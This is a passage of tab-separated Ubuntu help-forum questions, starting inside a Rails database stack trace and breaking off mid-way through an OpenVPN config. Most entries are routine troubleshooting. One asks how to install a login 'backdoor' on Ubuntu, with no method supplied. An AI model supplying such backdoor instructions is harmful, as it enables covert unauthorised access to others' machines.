/var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:236 : in `call' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:236 : in `block in execute' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:231 : in `each' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:231 : in `execute' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:175 : in `block in invoke_with_call_chain' /usr/lib/ruby/2.0.0/monitor.rb:211 : in `mon_synchronize' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:168 : in `invoke_with_call_chain' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:197 : in `block in invoke_prerequisites' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:195 : in `each' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:195 : in `invoke_prerequisites' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:174 : in `block in invoke_with_call_chain' /usr/lib/ruby/2.0.0/monitor.rb:211 : in `mon_synchronize' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:168 : in `invoke_with_call_chain' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:197 : in `block in invoke_prerequisites' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:195 : in `each' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:195 : in `invoke_prerequisites' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:174 : in `block in invoke_with_call_chain' /usr/lib/ruby/2.0.0/monitor.rb:211 : in `mon_synchronize' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:168 : in `invoke_with_call_chain' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:161 : in `invoke' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:149 : in `invoke_task' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:106 : in `block ( 2 levels ) in top_level' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:106 : in `each' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:106 : in `block in top_level' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:115 : in `run_with_threads' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:100 : in `top_level' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:78 : in `block in run' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:165 : in `standard_exception_handling' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:75 : in `run' /var/lib/gems/2.0.0/gems/rake-10.1.1/bin/rake:33 : in ` < top ( required ) > ' /usr/local/bin/rake:23 : in `load' /usr/local/bin/rake:23 : in ` < main > ' could n't create database for { `` adapter '' = > '' postgresql '' , `` encoding '' = > '' unicode '' , `` database '' = > '' bathrooms_test '' , `` pool '' = > 5 , `` host '' = > '' localhost '' } ** invoke environment ( first_time ) ** execute environment ** execute db : schema : load_if_ruby ** invoke db : schema : load ( first_time ) ** invoke environment ** invoke db : load_config ** execute db : schema : load -- enable_extension ( `` plpgsql '' ) rake aborted ! fe_sendauth : no password supplied /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/postgresql_adapter.rb:825 : in `initialize' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/postgresql_adapter.rb:825 : in `new' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/postgresql_adapter.rb:825 : in `connect' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/postgresql_adapter.rb:542 : in `initialize' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/postgresql_adapter.rb:41 : in `new' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/postgresql_adapter.rb:41 : in `postgresql_connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/abstract/connection_pool.rb:440 : in `new_connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/abstract/connection_pool.rb:450 : in `checkout_new_connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/abstract/connection_pool.rb:421 : in `acquire_connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/abstract/connection_pool.rb:356 : in `block in checkout' /usr/lib/ruby/2.0.0/monitor.rb:211 : in `mon_synchronize' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/abstract/connection_pool.rb:355 : in `checkout' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/abstract/connection_pool.rb:265 : in `block in connection' /usr/lib/ruby/2.0.0/monitor.rb:211 : in `mon_synchronize' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/abstract/connection_pool.rb:264 : in `connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_adapters/abstract/connection_pool.rb:546 : in `retrieve_connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_handling.rb:79 : in `retrieve_connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/connection_handling.rb:53 : in `connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/migration.rb:611 : in `connection' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/migration.rb:624 : in `block in method_missing' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/migration.rb:597 : in `block in say_with_time' /usr/lib/ruby/2.0.0/benchmark.rb:281 : in `measure' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/migration.rb:597 : in `say_with_time' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/migration.rb:617 : in `method_missing' /home/hifriend/refugerestrooms/db/schema.rb:17 : in `block in < top ( required ) > ' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/schema.rb:42 : in `instance_eval' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/schema.rb:42 : in `define' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/schema.rb:62 : in `define' /home/hifriend/refugerestrooms/db/schema.rb:14 : in ` < top ( required ) > ' /var/lib/gems/2.0.0/gems/activesupport-4.0.0/lib/active_support/dependencies.rb:222 : in `load' /var/lib/gems/2.0.0/gems/activesupport-4.0.0/lib/active_support/dependencies.rb:222 : in `block in load' /var/lib/gems/2.0.0/gems/activesupport-4.0.0/lib/active_support/dependencies.rb:213 : in `load_dependency' /var/lib/gems/2.0.0/gems/activesupport-4.0.0/lib/active_support/dependencies.rb:222 : in `load' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/railties/databases.rake:253 : in `block ( 3 levels ) in < top ( required ) > ' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:236 : in `call' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:236 : in `block in execute' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:231 : in `each' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:231 : in `execute' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:175 : in `block in invoke_with_call_chain' /usr/lib/ruby/2.0.0/monitor.rb:211 : in `mon_synchronize' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:168 : in `invoke_with_call_chain' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:161 : in `invoke' /var/lib/gems/2.0.0/gems/activerecord-4.0.0/lib/active_record/railties/databases.rake:260 : in `block ( 3 levels ) in < top ( required ) > ' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:236 : in `call' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:236 : in `block in execute' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:231 : in `each' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:231 : in `execute' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:175 : in `block in invoke_with_call_chain' /usr/lib/ruby/2.0.0/monitor.rb:211 : in `mon_synchronize' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:168 : in `invoke_with_call_chain' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:197 : in `block in invoke_prerequisites' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:195 : in `each' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:195 : in `invoke_prerequisites' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:174 : in `block in invoke_with_call_chain' /usr/lib/ruby/2.0.0/monitor.rb:211 : in `mon_synchronize' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:168 : in `invoke_with_call_chain' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/task.rb:161 : in `invoke' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:149 : in `invoke_task' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:106 : in `block ( 2 levels ) in top_level' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:106 : in `each' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:106 : in `block in top_level' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:115 : in `run_with_threads' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:100 : in `top_level' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:78 : in `block in run' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:165 : in `standard_exception_handling' /var/lib/gems/2.0.0/gems/rake-10.1.1/lib/rake/application.rb:75 : in `run' /var/lib/gems/2.0.0/gems/rake-10.1.1/bin/rake:33 : in ` < top ( required ) > ' /usr/local/bin/rake:23 : in `load' /usr/local/bin/rake:23 : in ` < main > ' tasks : top = > db : schema : load does anyone have any idea whatsoever about what 's going on ? thanks !
428654	libreoffice impress auto play wo n't work	i 'm doing a presentation and i need the presentation to auto play . this is what i have it set to . when i start the slideshow nothing happens . i 'm using the default version that come with ubuntu 13.10 . what should i do ?
428656	driver for a ms lifecam	i recently purchased a ms lifecam camera for my pc . now i am trying to find a driver for it . all the drivers that came on the disk were either for windows 7 & 8 or a mac . can you tell me if there is a driver for ubuntu ? would appreciate hearing from you .
428657	usb can not be mounted	i am using a sandisk 8 gb , installed with ubuntu installing unetbootin , or whatever i do not remember . when i plugged it into the pc , it read as follows : unable to access ubuntu 13.04 i386 error mounting /dev/sdc6 at /media/paul/ubuntu 13.04 i386 : command-line `mount -t `` iso9660 '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , iocharset=utf8 , mode=0400 , dmode=0500 '' `` /dev/sdc6 '' `` /media/paul/ubuntu 13.04 i386 '' ' exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/sdc6 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so what can i do about this problem ?
428662	how do i install a backdoor to logon to ubuntu ?	please tell me , how can i install a backdoor so that i can reset the password from recovery mode , as well as from terminal . i would prefer that this be something that can only be done while installing and that it would notify you for a few days after installing that there is a backdoor so that you ca n't install ubuntu on someone 's computer with a backdoor to hack/crack there information .
428666	how can i install ubuntu on my laptop without usb stick or dvd ?	how can i install ubuntu on my laptop without usb stick or dvd ? i 've a dell inspiron n5100 with intel core i5 processor and now windows 7 is installed in it . i want to keep both of these operating system if possible . and if not , i would like to keep ubuntu but i do n't have a usb stick or cd-rom . is it possible without these ? if yes , please help me throughout it , i 'll be very thankful to you . what is wubi installation . and how can i do it ? .can anyone tell me step by step about it please..
428668	ubuntu 12.04 - help for sound under unity , silence under xfce4	i have an ubuntu 12.04 install - if i login with a default ( unity ) desktop session sound has always worked out of the box . i installed xfce4 and i ; m really happy with it but for the fact that there 's no sound . i bring up the mixer and set all of the output volumes to max but still hear nothing . the volume keys work in that they show the volume indicator going up and down but still no sound . i do n't know enough about sound under linux to know what 's missing or how to debug . help needed and appreciated . -- -raymond
428669	i can not rename files in bulk using ubuntu 's rename feature	i can not rename files in bulk using ubuntu 's rename feature . the files are on a ntfs partition . i want to rename files that look like this : whatever pic george.jpg tacoma narrows bridge.jpg green bottle.jpg to : filename ( 1 ) filename ( 2 ) filename ( 3 ) and i can not do this at all . i do n't want to use the command line either . so i can permanently erase files after i have encrypted them without exposing their contents to people who use a file recovery tool . i also do n't want a method that takes days or months to rename the file . that is , rename one file at a time . so if i have hundreds of files to rename , this wo n't be a option . i want to give a each file the same name and numbered in order like shown above . pyrenamer is not an option for me , unless you can find how to do that in pyrenamer .
428671	ubuntu 12.04 , asus f550c : it do not go in power save mode	if i remove the charger from my laptop asus f550c , it do not go in power save mode , as i can see from the applet cpu frequency scaling indicator indeed , usually if i suspend the laptop , it has very short period of autonomy : no more than 2 hours , usually when i recover it from suspend it is already off . even if i hibernate it , the battery duration is not what it should be . i add the fact that during the sleep mode the temperature of the laptop increase ( longer is the sleep mode , more the temperature increase ) . any suggestion ?
428673	vietnamese input method	after re-installing ubuntu 13.10 , the vietnamese input settings in ibus changed . before this it used the telex input method ( same as android and ios defaults ) . now it has a very strange keyboard with the diacritic accents replacing the number row . i would like to use the standard telex method if possible because the new layout is very bizarre and also makes it impossible to type numbers without switching back to english temporarily unless one has a numeric keypad .
428675	can brother ads 2000 scanner be used in ubuntu 12.04 ?	brother does n't list a driver for this scanner . is there one somewhere else ?
428676	can i get opengl 2.0 or higher on ubuntu 12.04 with intel hd 2500 ?	$ glxinfo | grep version server glx version string : 1.4 client glx version string : 1.4 glx version : 1.4 opengl version string : 1.4 ( 4.2.12002 compatibility profile context 9.12.0.0 ) my pc is running ubuntu 12.04 ( server edition ) . my cpu is i5-3470 ( with intel hd 2500 ) , supports up to 4.0. but how can i get it ?
428680	how to retain lcd brightness after reboot	i frequently test different linux distros and recently found a 'feature ' that i would like to know how to turn on in ubuntu . in my testing of fedora 20 i noticed that it retained the lcd brightness settings on my laptop after a reboot . ubuntu 13.10 nor 14.04 does this . the laptop in question is a lenovo t530 . does anyone know why/how fedora ( gnome 3.10 ) does this ? can it be replicated in ubuntu ?
428682	has anyone gotten steam games to work with amd and 13.10 saucy salamander ?	running saucy salamander 13.10 64-bit . installed steam via ubuntu software center . on installing , steam warns : opengl not using direct render , and links here ( unhelpful ) https : //support.steampowered.com/kb_article.php ? ref=9938-eyzb-7457 running amd beta linux drivers 13.25.18-140108a-166862e-ati on a radeon 290x glxinfo reports direct rendering is yes my user is part of the video group as well steam will run , but any game i try to load up with steam does not seem to want to launch .
428686	can not find hard drives after installing ubuntu 13.10	okay , i am not a much experienced linux user.recently my windows 7 went bad and i installed lubuntu , xubuntu , ubuntu 13.10 ( a triple boot ) . this morning i thought that i should only keep one os and put in the ubuntu saucy cd . i selected the `` erase everything and install '' option in the install menu . i thought that would only erase the other oss but when i booted into the recently installed ubuntu , i found out that i could not find any mounted hard drive on nautilus . i am confused and do not know what to do . this is the output of sudo lsblk : name maj : min rm size ro type mountpoint sda 8:0 0 298.1g 0 disk ├─sda1 8:1 0 296.1g 0 part / ├─sda2 8:2 0 1k 0 part └─sda5 8:5 0 2g 0 part [ swap ] sr0 11:0 1 1024m 0 rom sr1 11:1 1 102.3m 0 rom
428696	looking for a mail `` concentrator ''	i am trying to find a simple mail “concentrator” or a ‘relay and store’ . i have three computers and i need to have access to all emails from all of those computers ( laptop , desktop , phone , and one more ) . i also need to store what i sent in response , regardless of the machine i sent it from . i have several accounts , all right now on a large commercial web host pop/smtp ( i don’t know if they support map ) . the software i look for need to pump periodically the incoming mail from the server , and store it . it needs to allow access from the different machines , but leave the incoming email on the ubunto server . it also needs to receive email from any of the client machines , and forward it to the smtp server . i would like to minimize all other interaction to increase security . for that i would like to have minimalistic software , that of-course has to be as secure as possible . it can seat on a fixed ip , out in the open , or more likely behind a port-directed simple router . i would prefer to set up something simpler than a full mail server . no sendmail heuristics , or complex modules – just pop , smtp , and store whatever passes through it in both directions . any help would be appreciated
428697	no sound on ubuntu server 13.10	i have alsa installed . nothing is muted . my soundcard is selected and everything . i have searched the internet to no avail !
428698	chromebook with crouton : alternative repository to ports.ubuntu.com	i 'm using crouton on a samsung chromebook ( with an arm chip ) . crouton installs all the packages from ports.ubuntu.com , which is a fairly slow mirror for me . are there other mirrors that carry the arm packages ? https : //wiki.ubuntu.com/ubuntudevelopment/packagearchive # ports seems to suggest there are none , or at least very few - are there any ?
428700	help wanted to connect to wifi .	i 've just installed ubuntu 12.04 on my dell latitude e6400 and am unable to connect to wifi . no networks show up . it says i do n't have the proper drivers , which i ca n't get without a connection . i 'm nowhere near as tech-savvy as i would like to be , therefore i do n't know how be more specific than this . if someone could help me figure this out , i would be very grateful , as i 'm basically carrying around a glorified paperweight at the moment . i need this computer for school , so time is a bit of an issue .
428701	nvidia video engine utilization	i 've realized that the majority of the linux distributions and their video player applications , even adobe flash player , do n't use video engine utilization , and i want to know why ? because at least on windows this technology works very well , and this reduced the load on the cpu a lot . i am hoping to get your opinions . thanks ! i am using the nvidia proprietary driver . the comparison : on linux it 's video engine utilization in nvidia x server settings for nvidia graphics driver 331.49 . on windows it 's video engine load in gpu-z with nvidia driver as well . i hope this is understandable . the below screenshot shows the sensors tab of the gpu-z application in windows : the next screenshot shows the nvidia x server settings window in ubuntu :
428703	horrible graphics on my dell inspiron 17 with ubuntu 13.10	i just got a new laptop : dell inspiron 17 ( 3737 ) btx base . the graphic card is intel速 hd graphics 4400 i installed ubuntu 13.10 . the graphics are just horrible . it looks like an old 4 bits color display or something . i ran the system testing tool and i got the following results : graphics/driver_version failed error : no video driver loaded ! possibly in failsafe mode ! it looks like the video driver is not installed properly . how can i fix this ? here is some additional info : lspci -nn | grep vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation haswell-ult integrated graphics controller [ 8086:0a16 ] ( rev 09 ) i also tried the intel graphics installer , but nothing changed . still stuck with the same problem . thanks ,
428707	idt 92hd73c1 hdmi drivers studio 1535 ubuntu 12.04	so far loving ubuntu . however when i connect my laptop to my samsung tv via the hdmi connector i get no audio . i 've tried going to the audio settings and looked for the hdmi option . there is nothing there . i also see several question in this forum in regards to the drivers with no real resolution . does anybody know how this can be fixed ? any directions as to steps i can take or someone i can reach out to would be great . thank you .
428709	tata photon+ not getting detected on ubuntu 13.10	i have just started using ubuntu , so not quite acquainted to it.my dongle light blinks but the device is not being detected , in short i am not able to access internet , which i can in windows..please help
428713	create a screen session with a bash script using contab	i want a .jar file to run every time the server boots up ( we 're using a vps ) , and so i 've edited crontab using crontab -e and then adding @ reboot bash /home/bash/startserver.sh . but i have n't even gotten to the point where the script works at all . here 's my script : # ! /bin/bash screen -s bukkit cd $ home/server java -jar bukkit.jar the reason that i need to use screen is because when i start bukkit.jar , it goes into a console where i can enter more commands for that program ( i 'm sure you 're all familiar with minecraft and its servers on this site , though , haha ) , but i need to be able to do other commands as root and for other programs while it 's running , and even close my putty session . the only problem is that when this script is run , it creates a screen session , but it 's id is n't listed in screen -ls , as the id is blank . rather , i have to go to /run/screen/s-root to find the id and then use the typical screen -x -s $ name quit on it . maybe this is n't even possible , or maybe there 's actually a simpler way to do this ( i would love simpler ) , but i ca n't figure out why this is n't working . and if this is possible , is it possible to rejoin a session with screen -s bukkit when running a bash script ? ( multiple questions , i guess , but thank you so much for your help ! ( parentheses ) )
428716	winecfg launch immediately shuts down	after installing wine i was not able to launch the winecfg program from either the application list or from a terminal window . i am getting the error below from the terminal . thoughts on how to fix this ? if i figure this out , i 'll update it also . thinkcentre8189 : ~ $ winecfg wine : unhandled page fault on read access to 0x00000008 at address 0x7e1fe5e3 ( thread 0009 ) , starting debugger ... winedbg : internal crash at 0x7e8685e3
428717	need help booting ratpoison on a cr-48 chromebook	i 'm running chrubuntu and i followed these installation steps for ratpoison on ubuntu . but every time i try booting i get the following : : unable to launch `` /usr/share/xsessions/run_kiosk.sh '' x session -- - '' /usr/share/xsessions/run_kiosk.sh '' not found ; falling back to the default session . [ okay ] the mentioned shell script is in the folder specified . any advice on getting this running properly is much appreciated .
428718	what is the command to restart firefox from the command line ?	how to restart firefox from the command-line . i have already given as `` firefox '' . is this the right command to restart the firefox ?
428724	installing legends kubuntu 13.10 x64	i am running kubuntu 13.10 x64 . i am trying to install legends from playdeb repo . it wo n't let me install legends because the `` data '' file does n't have the `` : i386 '' behind it . it says that there are dependencies that are not met as i said the `` data '' file is labeled legends-data but when it tells me what is needed to install it says it is looking for legends-data : i386 . can someone please help to find a solution that will work . thx , mccalleyt
428726	should unity webapps look like a webpage	i 've got a few unity web apps on my ubuntu 13.10 mbp 17 '' . when i click on them they open up to the sites web page in my browser . i 'm just curious to know if the web-apps are supposed to do anything other than put a `` browser bookmark '' on the desktop/launcher . if so what am i doing wrong . i 'm comparing this to the experience of say the ft web app on the ipad or android , which feels like an actual standalone app with no address bar or window tab in the ui . thanks
428729	log in as root in ubuntu 12.04	i ran this commands in terminal and i didnt get any error : sudo passwd root and after setting password i ran this command : sudo passwd -u root but when i log off or reboot there is no root account ! ! please somebody tell me how can i login as root in ubuntu 12.04 !
428731	autocomplete terminal commands	i had done this previously but now i do n't remember the trick , something like when you type in command in terminal it should auto complete it by matching it with the similar commands given in history , so up arrow would show me matching history commands instead of plain old previous irrelevant commands .
428742	broadcom wireless bcm43142 does not discover all wireless networks in range	i reviewed this , and i 'm familiar with wlan device disappear ( bcm43142 ) although it seems that the wireless adapter is installed ( claimed ) correctly , i 'm unable to discover all wireless network in range , it only discovers a few . enclosed a snippet of my machine configuration $ cat /etc/*release* | grep -i distrib distrib_id=ubuntu distrib_release=13.10 distrib_codename=saucy distrib_description= '' ubuntu 13.10 '' $ lspci | grep -i bcm 01:00.0 network controller : broadcom corporation bcm43142 802.11b/g/n ( rev 01 ) $ lshw -c network *-network description : wireless interface product : bcm43142 802.11b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth3 version : 01 serial : c0:18:85 : bc:70 : ef width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.30.223.141 ( r415941 ) latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:16 memory : d0500000-d0507fff *-network description : ethernet interface product : ar8161 gigabit ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth2 version : 10 serial : 84:8f:69 : d4:38 : f8 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx duplex=full ip=192.168.1.105 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:45 memory : d0400000-d043ffff ioport:2000 ( size=128 ) $ lsmod | grep -i `` bcm\|wl '' bcma 46699 0 wl 4207760 0 lib80211 14381 2 wl , lib80211_crypt_tkip cfg80211 480503 2 wl , mac80211 $ ifconfig eth0 link encap : ethernet hwaddr 84:8f:69 : d4:38 : f8 inet addr:192.168.1.105 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :868f:69ff : fed4:38f8/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:16 eth1 link encap : ethernet hwaddr c0:18:85 : bc:70 : ef inet6 addr : fe80 : :c218:85ff : febc:70ef/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:78 errors:0 dropped:0 overruns:0 frame:0 tx packets:78 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:11043 ( 11.0 kb ) tx bytes:11043 ( 11.0 kb ) $ dmesg | grep -i bcm [ 2.135729 ] usb 2-1.5 : product : bcm43142a0 [ 17.274440 ] eth1 : broadcom bcm4365 802.11 hybrid wireless controller 6.30.223.141 ( r415941 ) any help will be appreciated ! update i also tried the following , but the problem still holds : $ sudo dpkg-reconfigure bcmwl-kernel-source and even $ sudo apt-get autoremove bcmwl-kernel-source $ sudo apt-get -- purge remove bcmwl-kernel-source $ sudo apt-get install bcmwl-kernel-source update 2 i even tried to search for any documentation of bcm43142 over linux wireless wiki . surprisingly , there was only one record , which says `` unsupported '' . can it be that the driver , which i am currently using , is detecting only 802.11n , and neither 802.11a/b/g ? update 3 i found a generic driver source from broadcom , and followed the installation manual . but it seems that there is a problem compiling the driver under kernel version 3.10 and above . to check the kernel version execute $ uname -r 3.11.0-17-generic searching around , i found a patch to fix the issue . applying it , let make complete successfully . $ make kbuild_nopedantic=1 make -c /lib/modules/`uname -r`/build m=`pwd` make [ 1 ] : entering directory `/usr/src/linux-headers-3.11.0-17-generic' cfg80211 api is prefered for this kernel version using cfg80211 api ld /tmp/wlan/built-in.o cc [ m ] /tmp/wlan/src/shared/linux_osl.o cc [ m ] /tmp/wlan/src/wl/sys/wl_linux.o cc [ m ] /tmp/wlan/src/wl/sys/wl_iw.o cc [ m ] /tmp/wlan/src/wl/sys/wl_cfg80211_hybrid.o ld [ m ] /tmp/wlan/wl.o building modules , stage 2 . cfg80211 api is prefered for this kernel version using cfg80211 api modpost 1 modules warning : modpost : missing module_license ( ) in /tmp/wlan/wl.o see include/linux/module.h for more information warning : modpost : found 1 section mismatch ( es ) . to see full details build your kernel with : 'make config_debug_section_mismatch=y' cc /tmp/wlan/wl.mod.o ld [ m ] /tmp/wlan/wl.ko make [ 1 ] : leaving directory `/usr/src/linux-headers-3.11.0-17-generic' though i am not sure if i should execute make install , since i am not sure of the out come and i really do not want it to break my system . any advise ?
428744	can not configure kerio-control-vpnclient in ubuntu 12.04 64bit	i have a problem with configuring kerio-control-vpnclient in ubuntu 12.04 64bit this command must work for me . the output says it is not installed . but it is installed : # dpkg-reconfigure kerio-control-vpnclient package `kerio-control-vpnclient ' is not installed and no info is available . use dpkg -- info ( = dpkg-deb -- info ) to examine archive files , and dpkg -- contents ( = dpkg-deb -- contents ) to list their contents . /usr/sbin/dpkg-reconfigure : kerio-control-vpnclient is not installed first time i install kerio-control-vpnclient it starts configuration wizard and i set it up . but after that i can not config it again with the command that it offers for reconfiguration . i still can start stop restart kerio and it is on my system but dpkg-reconfigure can not find it . i think it is because of 64bit system . i try to add i386 arch with this command : sudo sh -c `` echo 'foreign-architecture i386 ' > /etc/dpkg/dpkg.cfg.d/multiarch '' but still nothing .
428747	hp dv6 screen related problem	i am using ubuntu 13.10 . it has been working fine on my laptop ( hp envy dv6 ) , however i 'm facing an issue when i log in in ubuntu the screen goes black and nothing comes up . i have done an initial test on the hard disk and memory and they both working fine . also when i connect the laptop to the tv via hdmi the screen on my laptop works as well as the tv . as soon as i disconnect the hdmi from the laptop the screen of the laptop goes blank again . if someone faced the same issue or knows how solve this problem i will really appreciate your help . thanks
428749	i ca n't access ubuntu 13.10 after installing windows 8.1	i was using ubuntu 13.10 and ubuntu studio 13.10 along with windows 7 , and then i installed windows 8.1 in place of the windows 7 . now the pc ( toshiba satellite l855 ) directly boot into windows 8.1 with out giving me the grub choice menu . i ca n't access both ubuntu as well as ubuntu studio os .
428751	ubuntu and openvpn	im trying to setup openvpn on ubuntu and i ca n't get internet access when i connect . only local ip of server is reachable ( 10.8.0.1 ) please help . my configurations : server.conf # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # sample openvpn 2.0 config file for # # multi-client server . # # # # this file is for the server side # # of a many-clients < - > one-server # # openvpn configuration . # # # # openvpn also supports # # single-machine < - > single-machine # # configurations ( see the examples page # # on the web site for more info ) . # # # # this config should work on windows # # or linux/bsd systems . remember on # # windows to quote pathnames and use # # double backslashes , e.g . : # # `` c : \\program files\\openvpn\\config\\foo.key '' # # # # comments are preceded with ' # ' or ' ; ' # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # which local ip address should openvpn # listen on ? ( optional ) ; local a.b.c.d # which tcp/udp port should openvpn listen on ? # if you want to run multiple openvpn instances # on the same machine , use a different port # number for each one . you will need to # open up this port on your firewall . port 1194 # tcp or udp server ? ; proto tcp proto udp # `` dev tun '' will create a routed ip tunnel , # `` dev tap '' will create an ethernet tunnel . # use `` dev tap0 '' if you are ethernet bridging # and have precreated a tap0 virtual interface # and bridged it with your ethernet interface . # if you want to control access policies # over the vpn , you must create firewall # rules for the the tun/tap interface . # on non-windows systems , you can give # an explicit unit number , such as tun0 . # on windows , use `` dev-node '' for this . # on most systems , the vpn will 